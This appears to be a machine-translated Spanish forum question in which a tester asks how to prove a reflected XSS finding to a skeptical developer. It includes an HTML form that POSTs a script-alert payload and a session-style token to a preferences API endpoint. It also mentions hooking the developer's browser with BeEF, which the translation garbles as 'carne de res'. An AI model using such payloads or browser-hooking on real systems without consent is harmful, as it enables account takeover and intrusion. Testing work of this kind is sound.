Estaba intentando hacer un PoC de XSS:
Muestra de ataque:
He inyectado script en el valor:
<html>
<body>
<form action="https://test.com/api/users.prefs.set?t=1447648400" method="POST">
<input type="hidden" name="name" value="emoji_use" />
<input type="hidden" name="value" value="<script>alert('xss')</script>" />
<input type="hidden" name="token" value="xoxs-14407185377-14407185393-14621684436-9d317bf841" />
<input type="hidden" name="_attempts" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Y pude obtener una respuesta exitosa desde el navegador con <script>alert('xss')</script>
. Ahora el guión se inyectó y se reflejó en la respuesta, lo señalé como XSS reflejado. El problema es que la alerta no se muestra, por lo que viene como respuesta del navegador .
Ahora mi desarrollador sostiene que el script desde no se ejecuta en el navegador, por lo que no es vulnerable. ¿Cómo puedo hacer una prueba de concepto para esto?
La posible explotación que se me ocurre es enviar un enlace diseñado al desarrollador con carne de res y controlar la máquina para demostrar la vulnerabilidad.
¿Alguna otra manera de probar el XSS reflejado o cualquier posible explicación que convenza a mi desarrollador? Estoy buscando sugerencias de la comunidad, ¿alguna otra idea para demostrarlo?